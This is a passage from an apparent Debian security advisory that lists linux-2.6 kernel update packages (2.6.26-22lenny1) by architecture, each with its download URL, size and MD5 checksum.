http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-22lenny1_all.deb Size/MD5 checksum: 126228 be9c5c392a1ab0cf0a297063abf983f6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-22lenny1_all.deb Size/MD5 checksum: 1764832 b0d63ac0b12a0679867b8b53bf4c3a54 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.26_2.6.26-22lenny1_all.deb Size/MD5 checksum: 2871892 c5c0e0d8ea193812566f9481e6ca8440 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-22lenny1_all.deb Size/MD5 checksum: 48764508 9a203c801fd068d282d1cbb11fbab68f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-22lenny1_all.deb Size/MD5 checksum: 4627886 fe792ad0bcf2c9f8ac4bb496e9885a20 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-22lenny1_all.deb Size/MD5 checksum: 110906 6ef2c4468e55570a3e571021299d4760

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 374304 046703c72d1bf6bcc81cb462e0f4d7ec http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 372708 a6922d1de2035d2745d5ad56a6e38eb9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 28676342 687312e7cdf46a79c7c4b974cbe5b542 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 3620318 4c7448f11e8a63ddec95b7ddaf6e9c02 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 29374588 452a568c8f74d69e3b7ba6e1685d4863 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 373176 fbda1e3fb70a213ee26ab4e0a5af16a7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 110428 82fc153ba577607964e55ce0d5eba8a8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 110404 9e24c63932b52a18206f951f18438a90 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 760714 dbef4d63df60be4c54e5a8999b2f1203 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-22lenny1_alpha.deb Size/MD5 checksum: 28661322 db654cfdd26ec48b75fbf73bae54d15b

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 391290 529d0af88248eeb9db6c720147c3c9c9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 1809098 2119049dd7757d1a7aa9b0cb6d65a4e6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 753158 c06cd160c023755232e79c187b20a98e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 391970 7e2145ea394dcbd739307b7cff343ffc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 387348 d76eb180fa81f742ee87d9524f3bc5a3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 20949852 a3c0bd81f9f9cc96d2e42521fb963fb9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 3757248 db362b7459220059221418a2b1542659 http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 110338 19ec7c8ca6e51c0a93352a059f9d5df8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 19315990 c185e17d0ca1ed640106dbb828c919f8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 110374 0e703e2b4306ca1e68cc61460ef86686 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 21102730 604476ba9a35fdb435b4409e5323cf89 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 3724662 ae8fed857d819d7a3dd5b3085c367085 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 3780338 a2cd8cdd414be8c412bd923576ccb456 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 3856722 9621b8e802a4e482de1db03572b0f72d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 20931422 9d71c45188552af06abd5a04d62b7c84 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 110350 acdbea58008fec881f380752f9fc3ea6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-amd64_2.6.26-22lenny1_amd64.deb Size/MD5 checksum: 397220 709b723fefd37764ab8bffb079eb312f

arm architecture (ARM)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 12494622 96304f7aa2bddb3ea2ef404afaa4a513 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 352980 44e27ad26963a2c1dbed9240b28d7c5b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 10294730 8066047f7d15cd2f7a6c93018cfaae37 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 369410 e26f28edccaeabf04dec8e4d2d8cc88f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 11443274 d9232ed2bbde0e851f72488a2eea831d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 110444 631821dedb019f48b3133246338f4521 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 751260 027d7225ddd40e26f12a9c7c7cc17b55 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 4140556 a36e76af416da97176639d34a6dd42a2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 368088 8388881b72ce56cef47cb61a51abfe8d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 11731284 cc6e8949fe66950db619eb2996332572 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 110404 611a83d9ddb07104525d3ae7eca714b8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-22lenny1_arm.deb Size/MD5 checksum: 364180 878a5bd8fa6419dd6efe6422c7a14cbc

armel architecture (ARM EABI)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 365700 0327b96ec1802e56c4ffee19ce1c9dc5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 368810 05ee76d995844fc8461223846ab41802 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 110358 830c76ccdf7d7c99f3ea84e1e8bc962d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 11691670 0ecbec767291466b244fd83506f1e112 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 110392 c64900dc9ec3812df164d47c006ecffe http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 11399558 2d16b67f176b8223bd4dd33b90217a2e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 340088 3b6e8d8210d6e6e68eee6ddc2cab8f09 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 4136736 42aebe2283d941bb7724daf03882914d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 12451186 f22b998fbdfa29023573bf9b6988dba9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 751906 d1d0480ba764b4ca3bdae8a651acd066 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 9606938 569b72a642446ac1ffe4ed2aa13f50aa http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-22lenny1_armel.deb Size/MD5 checksum: 370546 a3f2c479e65c9ae3be17641001b33afc

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 302516 dd1800b19f0df391bd05658a0a7846c0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 110354 479a0788049f39e648e57a3c5007b993 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 3598606 4429cb37eda685553dde7198e5b47fd5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 762928 fe2e02babc93f6bdcc16c8f7ad8a5a88 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 301842 1e58cca757600c08424118ace4a50da5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 110374 9198f6103932b14d766b0e4c32110806 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 301034 890ed76fde4dedddcb9db60f7ba0091d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 17127808 a2cffd928aa5e30ab9f1f30e41b9aed1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 17678124 53aa5bddb6f2af761a8bfcb1fef54d02 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 15784596 c892e98e5ab6fcf6aa84aa5e5021309f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 16388546 0ce6b1186e64e745a0680088d2c9fcad http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-22lenny1_hppa.deb Size/MD5 checksum: 303348 6991ba8c20ae638798fda57540014d30

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 399720 ee32214acdf697edca92068f2d64f8b3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 110450 191bb7f29ece9f8ea2f8cff03efae3cd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 398126 32ef574340b20e8f2c7465f2290a8c0b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 413242 a5f35b11ae06961132fd16e21d5b5337 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 409820 586c33fc476019b08a3b75816d9bf520 http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 110392 3f9c02cb47bc1070b92358227e030768 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 20530142 c8e9146e82955c0dda3bcabe8b7542ef http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 20509696 98b0e600e9bca75f016f1c4878d9d8e7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 767274 369a4858f7dfa2560ec664a08fdbac42 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 3865974 0510efa636bb1554f9a2c040c1ee6f19 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 20409094 798b4bb9a4b8d81affc30dbc2f284cc3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 20679068 6b6c2a57037f510313311d76849a9b0a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 3807640 6b21b3346b8196f19ea59d16a2e7b8f4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 18198474 627d51edc59f86bd8dfe2e7a74a25723 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 20381812 493e6acfd2d47e456d1471ef44dd18ba http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 1596580 5f456e26e01a793881871f4d683b13b1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 417750 057786734b1771be73cea6c484a09cce http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 410364 4f381b525756e6cf131be68398e58fe7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 110394 46fba74b6675f6df2057da14ba3931f9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 409858 99ce0b8165bd71e4b90745ad5a7577d1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 3947966 aabcdf68ca8c4d35d87ad2eecb569517 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 20350468 fb0caa5f722a968820562223577a4e74 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 21022322 befe070ada9e62a69c15f38c9f0e706a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 3842206 b5e7820e844761d65d8dbf0a4ea639e5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-22lenny1_i386.deb Size/MD5 checksum: 411454 771b6960fbfd4658124eac3673e01e90

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 359186 d2391d9bdb5fe861abe5fbd0f9f2f989 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 3659176 8df0d712004a67cafedb9b4926970368 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 359256 18a5fda7c38b900462ea120ae04a3c98 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 34440420 2eddbf5140a8dc8a4a74d4e11a77ea44 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 751862 329f5ddfc14f4f6e63aa3834f7a927fe http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 3691882 19f4f11bbad0443a7ae7153823bcc0e7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 359722 f3d89cc673ff0f2e5b7ff2e718ff44f1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 34252074 96729f987e7b7e02802b240da3a3293c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 34376386 f97af824a762b90b102d84f5c1bf65f8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 110350 9881f68b5f5446c4c773dc60d655a589 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 34191126 c5412cb1277801d2a2488be36dc1ad0e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 110386 c1ddbef0eeae94731617e277b32018c6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-22lenny1_ia64.deb Size/MD5 checksum: 359654 cba07c82268fc13d6007ecf4be2c8508

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 262068 31c1aadffe81551bef675f9bc91b6f1e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 29432478 38c75d466da039b9e2ac1c70898b50ae http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 358936 9ec1ce1473362c253cf4dc7d2fd791f6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 3966442 111674b840698cede9cdf3ecec2d5e3b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 302384 7f9f26f809e46a4748158588402d7ace http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 359360 d07b20a27666a8cb2c43f03eeb729c57 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 285392 9d513d80efd66be3e9ba7fa929b13b5f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 303780 3a507cccd77e01f7449a8ff73a3e5f6f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 760156 80eaea319450a06fe9c2310bdff051e2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 23504896 f928208abb4eb3ade6185409df5fa417 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 20252984 09ee52755ae4cf03ca082e8dbc977206 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 20244176 3c568fce5cab57746ca1dc53c8fcc754 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 110400 6676cd4c8df659937bac47ed0c08bf37 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 110464 fcbbce5e6741f1a1ec4830dba9a8ee91 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 11542616 0ead2243e1d4c2cb50760d97f9a6a2f7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-22lenny1_mips.deb Size/MD5 checksum: 15769388 08c7a66b4f1a5c9bc9f8cc5683d5786f

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 19682018 7e665290822815634b1666523270919e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 110460 445931c0ad4fa00f8875f5cbaf9d83aa http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 19667420 02ae9fef2fea1c4ccd667c73025039f9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 760930 064ffab1507d84791e943528662e4c86 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 297650 4433daa21c6e697d8c1bb33355e14ee1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 359828 870a33c1aea0535ab0b25f3016aa9623 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 23074870 998294807dde61335d413ecf50fdbf3b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 3967560 590a467f25e74daf442dfd54caaf104e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 303240 9620ba551b29adb6052e13f8277347c0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 302768 59fe05d578020afc8e1e8fe3fce3b41c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 28568828 86e20054979d1ffc56c24f5db73d044a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 110406 3a073335ba3488e55549b82e005fefda http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 15056072 429c33859de62cdfaa86e809e8625bec http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-22lenny1_mipsel.deb Size/MD5 checksum: 359706 43272f2843e3b39735812c24aad332f5

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 110358 eb7bc8e6a28a6801bc7be5d22bf95a2f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 23581674 48797e6c39bef5a0fd120d973b541f07 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 363808 c2c489e8798d50db73d709367e390113 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 365378 a4c38de9a287a71e84d09d5474393d41 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 110392 9dd420c73a4b0c7d55fe2372a439adfb http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 23420066 5bf69b74154de2ae05db3280f2070b74 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 3782640 31d483da8ccb87dbd7f75200515c8b3f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 23474914 42ba4ae5a23355aba50cb1a8c018a631 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 366524 a3970adc5168a37d49f28c5ce4ca05ff http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 746782 d0ef1631862e4130479ce4e3da0a6050 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-22lenny1_powerpc.deb Size/MD5 checksum: 3814900 2b936155fef59a231764ca014043b806 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-22lenny1_powerpc.deb Size/MD5 